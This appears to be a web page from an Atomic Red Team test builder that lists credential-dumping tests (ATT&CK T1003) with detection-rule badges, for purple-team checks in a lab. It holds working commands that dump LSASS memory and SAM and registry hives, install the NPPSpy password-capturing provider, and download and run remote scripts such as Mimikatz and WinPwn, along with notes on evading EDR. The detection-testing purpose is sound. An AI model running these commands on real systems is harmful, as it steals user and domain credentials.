Atomic Red Team
Atomic test builder
Run one real attacker behaviour on purpose, and find out whether your detections actually fire.
Atomic Red Team is an open library of small, precise tests - one per ATT&CK technique, maintained by Red Canary. Each test performs a single real attacker action (dump LSASS, create a scheduled task, disable the firewall) in the smallest possible way. You run them deliberately, in a lab, to answer one question: when an attacker does this, does my detection catch it?
Why anyone runs these
Owning a SIEM and writing rules is not the same as those rules working. The only way to know is to perform the attack and watch. That tight red-action / blue-check loop is “purple teaming.” A test that runs silently is a hole in your visibility you did not know you had.
What this page adds
The raw tests only give you a command. For the technique each one exercises, we also show whether a detection rule even exists in the open corpus (Sigma / IDS / YARA), and - signed in, with your stack’s coverage declared - whether you detect it. So you run the tests that matter and you know what the result should be.
How to use it hide
Pick what to test. Start from a tactic (“test my credential-access coverage”), a platform, or type a technique ID or tool name. Narrow to the slice you actually care about instead of scrolling a flat list.
Read the test. Each card shows the ATT&CK technique it maps to (click it for full detail and detections), whether it needs admin, and which platforms it runs on. The description is the attacker behaviour it reproduces.
Check coverage before you run. A green detection-rule badge means the open corpus has a rule for this technique - your SIEM should too. A red no rule badge means nothing maps to it. With a stack selected, a second badge shows whether you declared coverage.
Copy the command and run it - in an isolated lab you own, never production. It is a real action. The “needs admin” flag tells you whether to run it elevated so the test is realistic.
Confirm your SIEM alerted. If it did, your detection works. If it stayed silent, you just found a gap - and this exact test reproduces it on demand while you tune the rule.
Close blind spots first. The bar above counts techniques with no rule; show only blind spots filters to them. Those are the cheapest, highest-value gaps to fix.
Active:
technique T1003
clear all
What you’re looking at · hover any badge below
The badges on each test
Each test reproduces one attacker behaviour. Hover any badge on a test and this panel explains what it means and whether you would catch it. The key pair: a detection rule in our catalog (is catching this even possible) versus your coverage (do you actually catch it).
▸
Matching tests
54OS Credential Dumping
Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's followed by two 32 character hashes. If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. You will receive only error output if you do not run this test from an elevated context (run as administrator) If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first.
"#{gsecdump_exe}" -a
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003
Credential Access
powershell
needs admin
windows
🛡 149 detection rules
Credential Dumping with NPPSpy
OS Credential Dumping
Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy. After user's logging in cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses Registry changes. NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NPPSPY.dll" -Destination "C:\Windows\System32" $path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER $UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy" Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue $rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -ErrorAction Ignore $rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -ErrorAction Ignore $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 -ErrorAction Ignore $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy -ErrorAction Ignore $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll" -ErrorAction Ignore echo "[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\NPPSpy.txt"
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003
Credential Access
powershell
needs admin
windows
🛡 149 detection rules
Dump svchost.exe to gather RDP credentials
OS Credential Dumping
The svchost.exe contains the RDP plain-text credentials. Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp.
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003
Credential Access
powershell
needs admin
windows
🛡 149 detection rules
Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)
OS Credential Dumping
AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:* C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:* C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003
Credential Access
powershell
needs admin
windows
🛡 149 detection rules
Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)
OS Credential Dumping
AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003
Credential Access
powershell
windows
🛡 149 detection rules
Dump Credential Manager using keymgr.dll and rundll32.exe
OS Credential Dumping
This test executes the exported function
KRShowKeyMgr located in keymgr.dll using rundll32.exe. It opens a window that allows to export stored Windows credentials from the credential manager to a file (.crd by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.). Reference: https://twitter.com/0gtweet/status/1415671356239216653rundll32.exe keymgr,KRShowKeyMgr
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003
Credential Access
powershell
windows
🛡 149 detection rules
Send NTLM Hash with RPC Test Connection
OS Credential Dumping
RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. Ref: https://twitter.com/vysecurity/status/974806438316072960
rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
command_prompt
needs admin
windows
🛡 79 detection rules
Dump LSASS.exe Memory using ProcDump
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
powershell
needs admin
windows
🛡 79 detection rules
Dump LSASS.exe Memory using comsvcs.dll
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
command_prompt
needs admin
windows
🛡 79 detection rules
Dump LSASS.exe Memory using direct system calls and API unhooking
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
"#{dumpert_exe}"
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
command_prompt
needs admin
windows
🛡 79 detection rules
Dump LSASS.exe Memory using NanoDump
LSASS Memory
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanondump.dmp file in the temp directory
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
manual
windows
🛡 79 detection rules
Dump LSASS.exe Memory using Windows Task Manager
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions.
T1003.001
Credential Access
command_prompt
needs admin
windows
🛡 79 detection rules
Offline Credential Theft With Mimikatz
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
"#{mimikatz_exe}" "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
command_prompt
needs admin
windows
🛡 79 detection rules
LSASS read with pypykatz
LSASS Memory
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes to the screen. Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
"#{venv_path}\Scripts\pypykatz" live lsa
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
powershell
needs admin
windows
🛡 79 detection rules
Dump LSASS.exe Memory using Out-Minidump.ps1
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:TEMP\lsass_*.dmp. Author of Out-Minidump: Matthew Graeber (@mattifestation)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
command_prompt
needs admin
windows
🛡 79 detection rules
Create Mini Dump of LSASS.exe using ProcDump
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
LSASS Memory
Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privileges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
powershell
needs admin
windows
🛡 79 detection rules
Dump LSASS with createdump.exe from .Net v5
LSASS Memory
Use createdump executable from .NET to create an LSASS dump. [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe" & "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
powershell
needs admin
windows
🛡 79 detection rules
Dump LSASS.exe using imported Microsoft DLLs
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
#{xordump_exe} -out #{output_file} -x 0x41
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
powershell
needs admin
windows
🛡 79 detection rules
Dump LSASS.exe using lolbin rdrleakdiag.exe
LSASS Memory
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with lolbin rdrleakdiag.exe. Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and $env:TEMP\results_<PID>.hlk.
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003.001
Credential Access
command_prompt
needs admin
windows
🛡 79 detection rules
Dump LSASS.exe Memory through Silent Process Exit
LSASS Memory
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to trigger specific actions for a monitored process in one of two scenarios; either the process terminates itself by calling ExitProcess(), or another process terminates it via the TerminateProcess() API. The major advantage of this technique is that it does not cause lsass.exe to crash, and since WerFault.exe is used to create file dumps all the time (not just lsass.exe), this method provides the added advantage of going undetected. WerFault.exe is a process known for dumping every crashing process, from an attacker standpoint this is appealing as their illicit credential extraction will appear benign because from a defender’s viewpoint it’s within the realm of normal activity. Upon successful execution, you should find the dump file in directory of your choice or "%temp%\SilentProcessExit" by default.
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.002
Credential Access
command_prompt
needs admin
windows
🛡 28 detection rules
Registry dump of SAM, creds, and secrets
Security Account Manager
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
reg save HKLM\sam %temp%\sam reg save HKLM\system %temp%\system reg save HKLM\security %temp%\security
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.002
Credential Access
command_prompt
needs admin
windows
🛡 28 detection rules
Registry parse with pypykatz
Security Account Manager
Parses registry hives to obtain stored credentials. Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
"#{venv_path}\Scripts\pypykatz" live lsa
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.002
Credential Access
command_prompt
needs admin
windows
🛡 28 detection rules
esentutl.exe SAM copy
Security Account Manager
Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.002
Credential Access
powershell
needs admin
windows
🛡 28 detection rules
PowerDump Hashes and Usernames from Registry
Security Account Manager
Executes a hashdump by reading the hashes from the registry.
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1" Invoke-PowerDump
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003.002
Credential Access
command_prompt
windows
🛡 28 detection rules
dump volume shadow copy hives with certutil
Security Account Manager
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". This can be done with a non-admin user account. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.002
Credential Access
powershell
windows
🛡 28 detection rules
dump volume shadow copy hives with System.IO.File
Security Account Manager
Dump hives from volume shadow copies with System.IO.File. [CVE-2021-36934](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36934)
1..#{limit} | % {
try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003.002
Credential Access
powershell
windows
🛡 28 detection rules
WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Security Account Manager
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
Run with powershell on windows, in an isolated lab. Then check your SIEM alerted.
T1003.002
Credential Access
command_prompt
needs admin
windows
🛡 28 detection rules
Dumping of SAM, creds, and secrets(Reg Export)
Security Account Manager
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
reg export HKLM\sam %temp%\sam reg export HKLM\system %temp%\system reg export HKLM\security %temp%\security
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.
T1003.003
Credential Access
command_prompt
needs admin
windows
🛡 24 detection rules
Create Volume Shadow Copy with vssadmin
NTDS
This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
vssadmin.exe create shadow /for=#{drive_letter}
Run with command_prompt on windows, in an isolated lab. Then check your SIEM alerted.